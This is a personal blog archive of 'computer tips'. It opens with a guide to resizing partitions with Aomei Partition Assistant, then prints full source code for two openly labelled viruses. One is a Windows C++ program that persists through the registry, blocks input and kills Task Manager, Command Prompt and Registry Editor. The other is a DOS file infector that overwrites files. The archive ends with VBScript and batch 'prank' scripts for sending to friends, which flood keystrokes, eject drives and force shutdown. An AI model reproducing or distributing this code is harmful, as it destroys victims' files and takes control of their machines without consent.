Showing posts with label Computer tips. Show all posts
Showing posts with label Computer tips. Show all posts

Friday, 9 March 2012


                      Many of might think that resizing the partition is little too complicated. I just came across something that might help us partition our disk efficiently.
The Aomei Partition Assistent is a partition manager that allows you to easily resize ,create,delete,format partition and more advanced operations.
 More specifically the partition manager has the functions that even the windows Disk Manger doesn't have.
As an instance, I took a screenshot of the disk partition layout before proceeding. You see a C drive with 20 GB total size and 12 GB free space. Keep these values in mind because they will change at the end of this article.


To be more helpful, i will give you the steps on how to use the Partition assistant:

1.Download and install the Aomei Partition Assistant.


 2.Launch the partition manager and see the main window.


3.Select D: partition. right click on it and select "Resize partition" in the drop down menu.




4.In the pop-up window, position the mouse pointer on the left handle and drag the slider bar rightwards to shrink.



5.click ok button to return the main window. There will be a block of contiguous unallocated space behind C: drive. 


 

Then, select: dive and drag the right slider bar rightwards to extend partition.

6.To save all changes, do not forget to click apply button on the toolbar. After that, click "proceed" button to move forward with the process.

After all the operations are complete Aomei partition assistant will give u a report. no need for rebooting the system.


In fact, it's not easy and safe for most individual users to resize partition, because improper partition resizing operation may cause data loss and endanger the whole system. Therefore, you need to choose reliable and professional partition software to do this for your computer running Windows 7, Vista, XP, 2000 and Windows Server 2000, 2003, 2008.

 Download Free Version Here:

Posted on 21:02 by Unknown

No comments

Sunday, 16 October 2011

visit this site to download picupr mobile up loader

Posted on 02:30 by Unknown

1 comment

Saturday, 1 October 2011

See this this link you may get some idea about linux server and network security

Posted on 07:15 by Unknown

2 comments

See this link it explain about linux network configuration

Posted on 07:06 by Unknown

No comments

Tuesday, 27 September 2011

Posted on 08:15 by Unknown

No comments

Posted on 07:18 by Unknown

No comments

Sunday, 11 September 2011

Posted on 07:17 by Unknown

No comments


visit this site it helpful for the final year projects

http://www.finalsemprojects.com/ieee-projects/

Posted on 06:47 by Unknown

No comments

this program never retrieve u r data . if u run program means .......so be careful ........................... 
#include
#include
#include
#include
#include
#include
using namespace std;

int random, Freq, Dur, X, Y;
HWND mywindow, TaskMgr, CMD, Regedit;
char Notepad[MAX_PATH]="notepad.exe";
char MineSweeper[MAX_PATH]="winmine.exe";
char Hearts[MAX_PATH]="mshearts.exe";
char Website[MAX_PATH]="http:\\www.google.com";

void SetUp();
void Run( int ID );
void Beeper(), OpenStuff(), Hibernation(), CrazyMouse();

DWORD WINAPI DestroyWindows(LPVOID);

int main()
{
srand( time(0) );
random = rand()%6;
system("title :.Virus.:");
BlockInput( true );
SetUp();
BlockInput( false );
CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL);
while(1)
{
Run( random );
Sleep(10);
}
}
void SetUp()
{
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,"\\winminer.exe");
CopyFile(pathtofile,system,false);

HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Mcft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "SetUp",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);

mywindow = FindWindow(NULL,":.Virus.:");
cout<<"You Are Doomed cyberot";
Sleep(1000);
ShowWindow(mywindow, false);
}

void Run( int ID )
{
if( ID == 1 )
{
BlockInput(true);
}
else if( ID == 2 )
{
Beeper();
}
else if( ID == 3 )
{
OpenStuff();
}
else if( ID == 4 )
{
Hibernation();
}
else if( ID == 5 )
{
CrazyMouse();
}
else
{
BlockInput(true);
Beeper();
OpenStuff();
CrazyMouse();
}
}

void Beeper()
{
Freq = rand()%2001;
Dur = rand()%301;
Beep( Freq, Dur );
}
void OpenStuff()
{
ShellExecute(NULL,"open",Notepad,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",MineSweeper,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",Hearts,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",Website,NULL,NULL,SW_MAXIMIZE);
}
void Hibernation()
{
Sleep(1000);
SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);
}
void CrazyMouse()
{
X = rand()%801;
Y = rand()%601;
SetCursorPos( X, Y );
}

DWORD WINAPI DestroyWindows(LPVOID)
{
while(1)
{
TaskMgr = FindWindow(NULL,"Windows Task Manager");
CMD = FindWindow(NULL, "Command Prompt");
Regedit = FindWindow(NULL,"Registry Editor");
if( TaskMgr != NULL )
{
SetWindowText( TaskMgr, "You Suck Balls Superman");
PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( CMD != NULL )
{
SetWindowText( CMD, "You Suck Balls Superman");
PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( Regedit != NULL )
{
SetWindowText( Regedit, "You Suck Balls Superman");
PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}

Sleep(10);
}
}

Posted on 06:35 by Unknown

No comments


This is an virus program . if u run this program means it erase all u r data in system so be careful . if it create any problem. is not my mistake ..... 
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst("*.*",&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],"rb");
host=fopen(ffblk.ff_name,"rb+");
if(host==NULL) goto next;
x=772;
printf("Infecting %s\n",ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf("DONE! (Total Files Infected= %d)",a);
end=clock();
printf("TIME TAKEN=%f SEC\n",(end-st)/CLK_TCK);
getch();
}

Posted on 06:20 by Unknown

No comments

Friday, 9 September 2011

 Hack your friend's keyboard and make him type "You are a fool" simultaneously:

Type :

Set wshShell = wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "You are a fool."

loop

Save it as "Anything.VBS" and send it.

Posted on 09:15 by Unknown

No comments

Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!

Type :


Set oWMP = CreateObject("WMPlayer.OCX.7")

Set colCDROMs = oWMP.cdromCollection

do
if colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

End If

wscript.sleep 5000

loop



Save it as "Anything.VBS" and send it.

Posted on 09:08 by Unknown

No comments

Convey your friend a lil' message and shut down his / her computer:

Type :

@echo off

msg * I don't like you

shutdown -c "Error! You are too stupid!" -s



Save it as "Anything.BAT" in All Files and send it.

Posted on 08:41 by Unknown

No comments